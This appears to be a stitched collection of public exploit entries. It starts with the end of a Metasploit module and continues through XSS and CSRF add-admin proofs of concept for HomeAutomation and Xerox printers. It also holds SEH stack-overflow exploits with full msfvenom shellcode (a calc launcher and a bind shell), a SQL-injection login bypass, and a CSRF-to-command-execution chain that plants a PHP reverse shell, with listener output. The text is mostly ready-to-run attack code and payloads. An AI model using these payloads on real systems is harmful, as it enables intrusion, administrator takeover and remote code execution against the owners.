build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
vprint_status("Build Number = #{build_num}")
unless sysinfo_value =~ /10/ && (build_num > 17133 && build_num < 18362)
fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17133-18362')
end
end
def ensure_clean_destination(path)
return unless file?(path)
print_status("#{path} already exists on the target. Deleting...")
begin
file_rm(path)
print_status("Deleted #{path}")
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
print_error("Unable to delete #{path}")
end
end
end
# Exploit: HomeAutomation 3.3.2 - Persistent Cross-Site Scripting
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: Tom Rosenback and Daniel Malmgren
# Product web page: http://karpero.mine.nu/ha/
# Affected version: 3.3.2
# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
# Advisory ID: ZSL-2019-5556
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5556.php
# HomeAutomation v3.3.2 Stored and Reflected XSS
Vendor: Tom Rosenback and Daniel Malmgren
Product web page: http://karpero.mine.nu/ha/
Affected version: 3.3.2
Summary: HomeAutomation is an open-source web interface and scheduling solution.
It was initially made for use with the Telldus TellStick, but is now based on a
plugin system and except for Tellstick it also comes with support for Crestron,
OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers,
etc.) based on an advanced scheduling system, taking into account things like
measurements from various sensors. With the houseplan view you can get a simple
overview of the status of your devices at their location in your house.
Desc: HomeAutomation suffers from multiple stored and reflected XSS vulnerabilities
when input passed via several parameters to several scripts is not properly sanitized
before being returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in context of an affected site.
Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
Apache/2.4.29 (Ubuntu)
PHP/7.4.0RC4
PHP/7.3.11
PHP 7.2.24-0ubuntu0.18.04.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5556
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5556.php
06.11.2019
--
Reflected XSS:
--------------
https://192.168.2.113/?page=houseplan&autologin=1&msg=eyJpZCI6IiIsInRleHQiOiI8bWFycXVlZT50ZXN0PC9tYXJxdWVlPlVzZXJuYW1lIG9yIHBhc3N3b3JkIHdyb25nIiwiYWRkaXRpb25hbFRleHQiOiIiLCJ0eXBlIjoiZXJyb3IiLCJhdXRvQ2xvc2UiOmZhbHNlLCJzaG93T25seUluRGVidWciOmZhbHNlfQ==
Stored XSS:
-----------
POST /homeautomation_v3_3_2/?page=conf-macros HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 998
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryq4LcgA7mbqElCW4q
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Referer: http://localhost/homeautomation_v3_3_2/?page=conf-macros&action=edit&id=-1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: HomeAutomation_user=admin; HomeAutomation_hash=842427e5fc831255d7aa811b70e64957; PHPSESSID=ldcipit064rfp5l8rtcah091og
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="id"
-1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="action"
save
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="name"
XSS
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="comment"
"><script>confirm(document.cookie)</script>
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="icon_on"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="scenario"
1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="devices[0]"
1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="statuses[0]"
1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="save"
Save
------WebKitFormBoundaryq4LcgA7mbqElCW4q--
# Exploit Title: XEROX WorkCentre 6655 Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-19
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-6655
# Software : Xerox Printer
# Product Version: WorkCentre® 6655
# Vulernability Type : Cross-Site Request Forgery (Add Admin)
# Vulenrability : Cross-Site Request Forgery
# CVE : N/A
# Description :
# The CSRF vulnerability was discovered in the WorkCentre® 6655 printer model of Xerox printer hardware.
# A request to add users is made in the Device User Database form field. This request is captured by
# the proxy. And a CSRF PoC HTML file is prepared. Xerox WorkCentre® 6655 printers allow CSRF. A request
# to add users is made in the Device User Database form field to the xerox.set URI.
# (The frmUserName value must have a unique name.)
HTTP POST Request :
POST /dummypost/xerox.set HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 494
Origin: https://server
Connection: close
Referer: https://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp
Cookie: PHPSESSID=d7c4d8f8efe7dd919e6d0f5c93ec16cd; PageToShow=; statusSelected=n1; statusNumNodes=9; frmFirstName=%22%3E%3Ch1%3Ea; frmLastName=%22%3E%3Ch1%3Ea; frmCompany=%22%3E%3Ch1%3Ea; frmDisplayName=%22%3E%3Ch1%3Ea%2C%20%22%3E%3Ch1%3Ea; frmEmail=test@test.com; frmIFax=324324324324; frmFaxNumber=324324324324; frmFriendlyName=; frmProtocol=SMB; frmXrxAdd_1=Ipv4; frmDocumentPath=; frmLoginName=; frmServerName=; frmServerVolume=; frmNdsTree=; frmNdsContext=; frmSmbShare=; frmHnAdd_1=; frmIpv4_1_1=0; frmIpv4_1_2=0; frmIpv4_1_3=0; frmIpv4_1_4=0; frmIpv6_Host_1=%3A%3A; WebTimerPopupID=4; propSelected=n28; propNumNodes=117; propHierarchy=000100000000000000000000000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue
Upgrade-Insecure-Requests: 1
CSRFToken=72d9d94444730e9b3d16953c7987c2b0cff73a5d6c60df40ba2804f07d24e494148665ebb53a2633e5a1e8b73ef64ad02536d260928c6f10f408f2e3fd7c0776&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1
HTTP Response :
HTTP/1.1 200 OK
Date: Wed, 18 Dec 2019 22:09:40 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 13518
CSRF HTML PoC :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://server/dummypost/xerox.set" method="POST">
<input type="hidden" name="CSRFToken" value="72d9d94444730e9b3d16953c7987c2b0cff73a5d6c60df40ba2804f07d24e494148665ebb53a2633e5a1e8b73ef64ad02536d260928c6f10f408f2e3fd7c0776" />
<input type="hidden" name="_fun_function" value="HTTP_Set_ccgen_fac_dispatch_fn" />
<input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?x=&sort=Fname&order=Up" />
<input type="hidden" name="CcgenModule" value="UserEdit" />
<input type="hidden" name="isRoles" value="True" />
<input type="hidden" name="isPassword" value="True" />
<input type="hidden" name="isCreate" value="True" />
<input type="hidden" name="rolesStr" value="2,5,1," />
<input type="hidden" name="limited" value="False" />
<input type="hidden" name="oid" value="0" />
<input type="hidden" name="userName" value="ismailtasdelen" />
<input type="hidden" name="friendlyName" value="Ismail Tasdelen" />
<input type="hidden" name="newPassword" value="Test1234" />
<input type="hidden" name="retypePassword" value="Test1234" />
<input type="hidden" name="role" value="2" />
<input type="hidden" name="role" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: FTP Navigator 8.03 - Stack Overflow (SEH)
# Date: December 28th, 2019
# Exploit Author: boku
# Discovered by: Chris Inzinga
# Original DoS: FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)
# Original DoS Link: https://www.exploit-db.com/exploits/47794
# Software Vendor: http://www.internet-soft.com/
# Software Link: https://www.softpedia.com/dyn-postdownload.php/5edd515b8045f156a9dd48599c2539e5/5dfa4560/d0c/0/1
# Version: Version 8.03
# Tested on: Microsoft Windows 7 Enterprise - 6.1.7601 Service Pack 1 Build 7601 (x86-64)
# Recreate:
#!/usr/bin/python
# 1) Generate 'poc.txt' payload using python 2.7.x
# 2) On target Windows machine, open the file 'poc.txt' with notepad, then Select-All & Copy
# 3) Install & Open FTP Navigator v8.03
# 4) Go to Menu Bar > FTP-Server Drop-down > click Custom Command
# - A textbox will appear on the bottom of the right window
# 5) Paste payload from generated txt file into textbox
# 6) Click "Do it"
# - The program will crash & calculator will open
blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # bash green success bullet
err = '\033[91m[\033[0m!\033[91m]\033[0m ' # bash red error bullet
try:
nops = '\x90'*400
# msfvenom -p windows/exec CMD='calc' -b '\x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper
#x86/alpha_upper succeeded with size 447 (iteration=0)
shellcode = b""
shellcode += b"\x89\xe7\xda\xd6\xd9\x77\xf4\x58\x50\x59\x49"
shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
shellcode += b"\x49\x4b\x4c\x4a\x48\x4d\x52\x35\x50\x35\x50"
shellcode += b"\x33\x30\x53\x50\x4c\x49\x4d\x35\x50\x31\x39"
shellcode += b"\x50\x52\x44\x4c\x4b\x50\x50\x56\x50\x4c\x4b"
shellcode += b"\x46\x32\x44\x4c\x4c\x4b\x31\x42\x42\x34\x4c"
shellcode += b"\x4b\x42\x52\x46\x48\x34\x4f\x4f\x47\x51\x5a"
shellcode += b"\x51\x36\x36\x51\x4b\x4f\x4e\x4c\x37\x4c\x33"
shellcode += b"\x51\x33\x4c\x44\x42\x56\x4c\x57\x50\x4f\x31"
shellcode += b"\x58\x4f\x54\x4d\x45\x51\x4f\x37\x5a\x42\x4b"
shellcode += b"\x42\x36\x32\x30\x57\x4c\x4b\x51\x42\x34\x50"
shellcode += b"\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x30\x4c\x32"
shellcode += b"\x31\x34\x38\x4b\x53\x57\x38\x43\x31\x4e\x31"
shellcode += b"\x46\x31\x4c\x4b\x31\x49\x51\x30\x45\x51\x48"
shellcode += b"\x53\x4c\x4b\x47\x39\x44\x58\x4b\x53\x37\x4a"
shellcode += b"\x31\x59\x4c\x4b\x56\x54\x4c\x4b\x35\x51\x4e"
shellcode += b"\x36\x50\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
shellcode += b"\x34\x4d\x45\x51\x59\x57\x30\x38\x4b\x50\x43"
shellcode += b"\x45\x5a\x56\x55\x53\x33\x4d\x4a\x58\x57\x4b"
shellcode += b"\x53\x4d\x31\x34\x54\x35\x4a\x44\x36\x38\x4c"
shellcode += b"\x4b\x31\x48\x36\x44\x45\x51\x38\x53\x35\x36"
shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x35"
shellcode += b"\x4c\x53\x31\x49\x43\x4c\x4b\x44\x44\x4c\x4b"
shellcode += b"\x55\x51\x38\x50\x4d\x59\x47\x34\x31\x34\x56"
shellcode += b"\x44\x51\x4b\x51\x4b\x55\x31\x46\x39\x31\x4a"
shellcode += b"\x30\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x50"
shellcode += b"\x5a\x4c\x4b\x42\x32\x4a\x4b\x4c\x4d\x31\x4d"
shellcode += b"\x53\x5a\x33\x31\x4c\x4d\x4b\x35\x48\x32\x33"
shellcode += b"\x30\x55\x50\x33\x30\x56\x30\x32\x48\x30\x31"
shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x38\x55\x4f"
shellcode += b"\x4b\x4c\x30\x4f\x45\x59\x32\x56\x36\x55\x38"
shellcode += b"\x59\x36\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x59"
shellcode += b"\x45\x37\x4c\x54\x46\x43\x4c\x54\x4a\x4d\x50"
shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x33\x35\x4f\x4b\x51"
shellcode += b"\x57\x32\x33\x53\x42\x52\x4f\x42\x4a\x35\x50"
shellcode += b"\x50\x53\x4b\x4f\x39\x45\x42\x43\x53\x51\x42"
shellcode += b"\x4c\x32\x43\x53\x30\x41\x41"
jmp2nops = '\xe8\xff\xff\xff\xff' # call +4 // This call will land us at the last \xff of our call instruction
jmp2nops += '\xc3' # ret/inc ebx // Since EIP is at \xff after call, this will be interpruted as: \xff\xc3 =inc ebx (a nop instruction)
jmp2nops += '\x59' # pop ecx // Pop the memory location from the call instruction that was pushed onto the stack into the ECX register
jmp2nops += '\x31\xd2' # xor edx, edx // Clear the EDX register. We are going to jump to the beginning of our buffer.
jmp2nops += '\x66\x81\xca\xfc\x0f' # or dx, 4092 // EDX is now equal to 0x00000ffc
jmp2nops += '\x66\x29\xd1' # sub ex, dx // We subtract 4092 bytes from our memory location in the ECX register.
jmp2nops += '\xff\xe1' # jmp ecx // Now we jump back to the beginning of our buffer; into our NOP sled.
offset = '\x41' * (4112-len(nops+shellcode+jmp2nops))
nSEH = '\xeb\xeb\x90\x90' # jmp short -22 (to jmp2nops)
# 0x00457576 [ftpnavi.exe] : pop edx # pop ebx # ret
# | Rebase: False | ASLR: False | SafeSEH: False
# | (c:\FTP Navigator\ftpnavi.exe) | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ}
SEH = '\x76\x75\x45' # SEH 3 byte overwrite
payload = nops+shellcode+offset+jmp2nops+nSEH+SEH
File = 'poc.txt'
f = open(File, 'w') # open file for write
f.write(payload)
f.close() # close the file
print blt + File + " created successfully "
except:
print err + File + ' failed to create'
# Exploit Title: AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)
# Date: December 2019-12-28
# Exploit Author: boku
# Original DoS: https://www.exploit-db.com/exploits/47788
# Original DoS Author: ZwX
# Software Vendor: http://www.avs4you.com/
# Software Link: http://www.avs4you.com/avs-audio-converter.aspx
# Version: 9.1.2.600
# Tested on: Microsoft Windows 10 Home 1909(x86-64) - 10.0.18363 N/A Build 18363
# Microsoft Windows 7 Enterprise(x86-64) - 6.1.7601 Service Pack 1 Build 7601
#!/usr/bin/python
# Recreate:
# 1) Generate the 'bind9999.txt' payload using python 2.7.x on Kali Linux.
# 2) On the victim Windows machine, open the file 'bind9999.txt' with notepad, then Select-All > Copy.
# 3) Install & Open AVS Audio Converter 9.1.2.600.
# 4) Locate the textbox to the right of 'Output Folder:'; at the bottom of the main window.
# 5) Paste the copied payload from the 'bind9999.txt' file into the textbox.
# 6) Click the 'Browse...' button; to the right of the textbox.
# - The program will freeze & a bind shell will be listening on tcp port 9999; on all interfaces.
# Special thanks to: The Offsec Team, Corelan Team, Vivek/Pentester Academy Team, Skape
blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # bash green success bullet
err = '\033[91m[\033[0m!\033[91m]\033[0m ' # bash red error bullet
File = 'bind9999.txt'
try:
# 0x00400000 [AVSAudioConverter.exe]
# 9.1.2.600 (C:\Program Files (x86)\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)
# - The only module that has SafeSEH disabled.
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll |
# 0x00400000 | 0x00f33000 | False | False | False | False | False |
# - Attempting a 3-byte SEH-handler overwrite will fail due to no exception being thrown.
offEdx = '\x41'*260
edx = '\x42\x42\x42\x42' # EDX overwrite at 260 bytes. EDX=0x42424242
# SEH-Record overwrite at offset 264; the goal from here is to not throw an exception or we're screwed.
nSEH = '\x42'*4
SEH = '\x43'*4
# - If address at offset 308 is not readable, then the program will throw an exception at:
# 75F9ECE7 3806 cmp byte ptr ds:[esi], al
# [!] Access violation when reading [esi]
# - If we can get past this exception, we can overwrite EIP at offset 304.
# - [esi] must be successfully overwriten so we can put our payload after it.
offEip = '\x45'*32
# - AVSAudioEditor5.dll is the only other module with both ASLR & Rebase disabled.
# - The enabled SafeSEH blocks us from using it for a SEH overwrite, but we can still jump
# to it with a vanilla EIP overwrite; due to overwriting a return address on the stack.
# - After bypassing the ESI read exception, our stack will look like this after the EIP overwrite:
# ECX=0018FA60 ESP=0018FA60 (Stack locations will vary)
# 0018FA54 45454545 EEEE // [296]
# 0018FA58 45454545 EEEE // [300]
# 0018FA5C 1006563E V... // [304] eip var # Pointer to 'pop+ret'
# *0018FA60 00000000 .... // [308] esi var # our esi address gets replaced by 4 nulls
# 0018FA64 1006A438 8... // [312] jmpEsp var # Pointer to 'jmp esp'
# 0018FA68 E510EC10 .... // [316] fixStack var # ASM to fix the Stack so shellcode will work
# [AVSAudioEditor5.dll] (C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSAudioEditor5.dll)
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll |
# 0x10000000 | 0x100a1000 | False | True | False | False | False |
# 0x1006563e : pop esi # ret | ascii {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll]
eip = '\x3e\x56\x06\x10' # pop+ret
# - After pop+ret, ESP=0018FA68
esi = '\x10\x10\x08\x10' # [AVSAudioEditor5.dll] | .data | RW
# 0x1006a438 : jmp esp | {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll]
# - the esi var address is just a random, readable memory location that will not move; to bypass the exception.
jmpEsp = '\x38\xa4\x06\x10' # jmp esp pointer
# EBP is 45454545 at this point. Needs to be fixed for most shellcode payloads to work properly.
fixStack = '\x83\xEC\x10' # sub esp, 0x10
fixStack += '\x89\xE5' # mov ebp, esp
fixStack += '\x83\xEC\x60' # sub esp, 0x60
#msfvenom -p windows/shell_bind_tcp LPORT=9999 -v shellcode -a x86 --platform windows -b '\x00' --format python
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)
shellcode = b""
shellcode += b"\xbe\xd8\x49\x8d\x72\xd9\xe5\xd9\x74\x24\xf4"
shellcode += b"\x5a\x31\xc9\xb1\x53\x31\x72\x12\x83\xea\xfc"
shellcode += b"\x03\xaa\x47\x6f\x87\xb6\xb0\xed\x68\x46\x41"
shellcode += b"\x92\xe1\xa3\x70\x92\x96\xa0\x23\x22\xdc\xe4"
shellcode += b"\xcf\xc9\xb0\x1c\x5b\xbf\x1c\x13\xec\x0a\x7b"
shellcode += b"\x1a\xed\x27\xbf\x3d\x6d\x3a\xec\x9d\x4c\xf5"
shellcode += b"\xe1\xdc\x89\xe8\x08\x8c\x42\x66\xbe\x20\xe6"
shellcode += b"\x32\x03\xcb\xb4\xd3\x03\x28\x0c\xd5\x22\xff"
shellcode += b"\x06\x8c\xe4\xfe\xcb\xa4\xac\x18\x0f\x80\x67"
shellcode += b"\x93\xfb\x7e\x76\x75\x32\x7e\xd5\xb8\xfa\x8d"
shellcode += b"\x27\xfd\x3d\x6e\x52\xf7\x3d\x13\x65\xcc\x3c"
shellcode += b"\xcf\xe0\xd6\xe7\x84\x53\x32\x19\x48\x05\xb1"
shellcode += b"\x15\x25\x41\x9d\x39\xb8\x86\x96\x46\x31\x29"
shellcode += b"\x78\xcf\x01\x0e\x5c\x8b\xd2\x2f\xc5\x71\xb4"
shellcode += b"\x50\x15\xda\x69\xf5\x5e\xf7\x7e\x84\x3d\x90"
shellcode += b"\xb3\xa5\xbd\x60\xdc\xbe\xce\x52\x43\x15\x58"
shellcode += b"\xdf\x0c\xb3\x9f\x20\x27\x03\x0f\xdf\xc8\x74"
shellcode += b"\x06\x24\x9c\x24\x30\x8d\x9d\xae\xc0\x32\x48"
shellcode += b"\x5a\xc8\x95\x23\x79\x35\x65\x94\x3d\x95\x0e"
shellcode += b"\xfe\xb1\xca\x2f\x01\x18\x63\xc7\xfc\xa3\xac"
shellcode += b"\x17\x88\x42\xd8\x37\xdc\xdd\x74\xfa\x3b\xd6"
shellcode += b"\xe3\x05\x6e\x4e\x83\x4e\x78\x49\xac\x4e\xae"
shellcode += b"\xfd\x3a\xc5\xbd\x39\x5b\xda\xeb\x69\x0c\x4d"
shellcode += b"\x61\xf8\x7f\xef\x76\xd1\x17\x8c\xe5\xbe\xe7"
shellcode += b"\xdb\x15\x69\xb0\x8c\xe8\x60\x54\x21\x52\xdb"
shellcode += b"\x4a\xb8\x02\x24\xce\x67\xf7\xab\xcf\xea\x43"
shellcode += b"\x88\xdf\x32\x4b\x94\x8b\xea\x1a\x42\x65\x4d"
shellcode += b"\xf5\x24\xdf\x07\xaa\xee\xb7\xde\x80\x30\xc1"
shellcode += b"\xde\xcc\xc6\x2d\x6e\xb9\x9e\x52\x5f\x2d\x17"
shellcode += b"\x2b\xbd\xcd\xd8\xe6\x05\xfd\x92\xaa\x2c\x96"
shellcode += b"\x7a\x3f\x6d\xfb\x7c\xea\xb2\x02\xff\x1e\x4b"
shellcode += b"\xf1\x1f\x6b\x4e\xbd\xa7\x80\x22\xae\x4d\xa6"
shellcode += b"\x91\xcf\x47"
payload = offEdx+edx+nSEH+SEH+offEip+eip+esi+jmpEsp+fixStack+shellcode
# offsets: 0 260 264 268 272 304 308 312 316 324
f = open(File, 'w') # open file for write
f.write(payload)
f.close() # close the file
print blt + File + " created successfully "
# root@kali# nc <Victim IP> 9999
# Microsoft Windows [Version 6.1.7601]
# C:\Program Files (x86)\AVS4YOU\AVSAudioConverter>
except:
print err + File + ' failed to create'
# Exploit Title: elearning-script 1.0 - Authentication Bypass
# Author: riamloo
# Date: 2019-12-29
# Vendor Homepage: https://github.com/amitkolloldey/elearning-script
# Software Link: https://github.com/amitkolloldey/elearning-script/archive/master.zip
# Version: 1
# CVE: N/A
# Tested on: Win 10
# Discription:
# E Learning Blog Developed In Raw PHP
# Vulnerability: Attacker can bypass login page and access to dashboard page
# vulnerable file : /login.php
# Parameter & Payload: '=''or'
# Proof of Concept:
http://localhost/elearning-script-master/login.php
POST /elearning-script-master/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
Content-Length: 445
Referer: http://localhost/elearning-script-master/login.php
Cookie: PHPSESSID=a81sp8jg62nzxs8icvbf44ep3iu
Connection: close
Upgrade-Insecure-Requests: 1
'=''or'
# Exploit: HomeAutomation 3.3.2 - Remote Code Execution
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: Tom Rosenback and Daniel Malmgren
# Product web page: http://karpero.mine.nu/ha/
# Affected version: 3.3.2
# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
# Advisory ID: ZSL-2019-5560
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5560.php
HomeAutomation v3.3.2 CSRF Remote Command Execution (PHP Reverse Shell) PoC
Vendor: Tom Rosenback and Daniel Malmgren
Product web page: http://karpero.mine.nu/ha/
Affected version: 3.3.2
Summary: HomeAutomation is an open-source web interface and scheduling solution.
It was initially made for use with the Telldus TellStick, but is now based on a
plugin system and except for Tellstick it also comes with support for Crestron,
OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers,
etc.) based on an advanced scheduling system, taking into account things like
measurements from various sensors. With the houseplan view you can get a simple
overview of the status of your devices at their location in your house.
Desc: The application suffers from an authenticated OS command execution vulnerability
using custom command v0.1 plugin. This can be exploited with CSRF vulnerability to
execute arbitrary shell commands as the web user via the 'set_command_on' and 'set_command_off'
POST parameters in '/system/systemplugins/customcommand/customcommand.plugin.php' by
using an unsanitized PHP exec() function.
===============================================================================
/system/systemplugins/customcommand/customcommand.plugin.php:
-------------------------------------------------------------
77: function toggleDevices($devicesToToggle, $statuses) {
78: $output = array();
79: $command = "";
80:
81: foreach($devicesToToggle as $device)
82: {
83: $status = $statuses[$device["id"]];
84: if($status == 0) {
85: $command = $this->getSettings("command_off");
86: } else {
87: $command = $this->getSettings("command_on");
88: }
89:
90: if(!empty($command)) {
91: $command = replaceCustomStrings($command, $device, $statuses[$device["id"]]);
92:
93: exec($command, $output);
94:
95: SaveLog("Command: ".$command."\nOutput:\n".parseExecOutputToString($output));
96: }
97: }
98:
99: return "";
100: }
===============================================================================
Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
Apache/2.4.29 (Ubuntu)
PHP/7.4.0RC4
PHP/7.3.11
PHP 7.2.24-0ubuntu0.18.04.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5560
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5560.php
06.11.2019
--
POST /homeautomation_v3_3_2/?page=conf-systemplugins HTTP/1.1
plugin=customcommand&action=savesettings&set_command_on=php+-r+%27%24sock%3Dfsockopen%28%22127.0.0.1%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh+-i+%3C%263+%3E%263+2%3E%263%22%29%3B%27&set_command_off=&savesettings=Save
-
lqwrm@metalgear:/$ nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from localhost 40724 received!
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/var/www/html/homeautomation_v3_3_2
$ exit
lqwrm@metalgear:/$
# Exploit Title: Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-17
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/altalink-c8000-series
# Software : Xerox Printer
# Product Version: AltaLink C8035
# Vulernability Type : Cross-Site Request Forgery (Add Admin)
# Vulenrability : Cross-Site Request Forgery
# CVE : N/A
# Description :
# The CSRF vulnerability was discovered in the AltaLink C8035 printer model of Xerox printer hardware.
# A request to add users is made in the Device User Database form field. This request is captured by
# the proxy. And a CSRF PoC HTML file is prepared. Xerox AltaLink C8035 printers allow CSRF. A request
# to add users is made in the Device User Database form field to the xerox.set URI.
# (The frmUserName value must have a unique name.)
# HTTP POST Request :
POST /dummypost/xerox.set HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 707
Origin: https://XXX.XXX.XXX.XXX
Connection: close
Referer: https://XXX.XXX.XXX.XXX/properties/authentication/UserEdit.php?nav_point_key=10
Cookie: PHPSESSID=fd93756986787a2e338da8eae1ff2ef4; statusSelected=n1; statusNumNodes=8; CERT_INFO=8738a6169beda5f6cc754db4fc40ad63; propSelected=n59; propHierarchy=00000001000000000000000010010; LastPage=/properties/authentication/UserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp
Upgrade-Insecure-Requests: 1
NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3F&isRoles=True&isPassword=True&isCreate=True&rolesStr=6%2C1%2C2&limited=0&oid=0&minLength=1&maxLength=63&isFriendlyNameDisallowed=TRUE&isUserNameDisallowed=TRUE&isNumberRequired=&CSRFToken=34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a¤tPage=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10&_fun_function=HTTP_Set_User_Edit_fn&frmFriendlyName=Ismail+Tasdelen&frmUserName=ismailtasdelen&frmNewPassword=Test1234%21&frmRetypePassword=Test1234%21&frmOldPassword=undefined&SaveURL=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10
# CSRF PoC HTML :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://XXX.XXX.XXX.XXX/dummypost/xerox.set" method="POST">
<input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?" />
